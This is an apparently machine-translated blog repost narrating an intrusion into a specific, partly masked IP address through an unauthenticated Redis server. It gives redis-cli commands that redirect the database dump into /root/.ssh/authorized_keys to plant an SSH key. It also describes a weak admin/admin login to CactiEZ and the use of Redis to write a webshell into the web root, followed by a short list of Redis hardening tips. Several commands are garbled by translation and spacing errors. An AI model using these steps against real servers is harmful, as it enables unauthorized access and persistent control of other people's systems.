Shulou(Shulou.com)06/01 Report--

There are a lot of topics about redis these days, so there is the following story.

Target IP:210.73.90.xxx

Exploitation: unauthorized redis access

Exploit 1:

1) generate the secret key locally

Root@GanDolf:~# ssh-keygen-t rsa

2) write the public key to a file

Root@GanDolf:~# cd / root/.ssh/

Root@GanDolf:~/.ssh# (echo-e "\ n\ n"; cat id_rsa.pub; echo-e "\ n\ n") > foo.txt

3) Connect redis to write file root@GanDolf:~/.ssh# cat foo.txt | redis-cli-h 210.73.90.xxx-x set crackit

OK

Root@GanDolf:~/.ssh# redis-cli-h 210.73.90.xxx

210.73.90.xxx:6379 > config set dir / root/.ssh/

OK

(1.39s)

210.73.90.xxx:6379 > CONFIG GET dir

1) "dir"

2) "/ root/.ssh"

210.73.90.xxx:6379 > config set dbfilename "authorized_keys"

OK

(1.03s)

210.73.90.xxx:6379 > SAVE

SaOK

(1.40s)

210.73.90.xxx:6379 > SAVE

OK

210.73.90.xxx:6379 > exit

Root@GanDolf:~/.ssh# ssh

4) connect to the server

Root@GanDolf:~/.ssh# ssh-I id_rsa root@210.73.90.xxx

Found to open port 22

So far this method has failed

Exploit 2:

Nmap scan results:

80443 Open

Access 80 used to be CactiEZ v10 version

An attempt to log in to admin admin with a weak password was successful and no long pass path was found.

Try redis to write webshell

Premise: the physical path of the website

The manual explosion failed several times.

Turn to dig for some installation information of CactiEZ v10

Therefore, download CactiEZ v10 to build your own virtual installation, launch to find the physical path:

/ var/www/html

So use redis to write shell

So the kitchen knife joined up:

Finally, throw a small size. See if you can dig anything, and then bounce back to the local, content roaming (many switches, host ^ _ ^)

Finally, the security recommendations for redis are summarized:

1) modify the default port

2) listen on the local port

3) use non-root startup, otherwise there will be a loophole 1 and get the root permission directly

4) modify the configuration file and disable related commands

# rename-command CONFIG b840fc02d524045429941cc15f59e41cb7be6c52

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.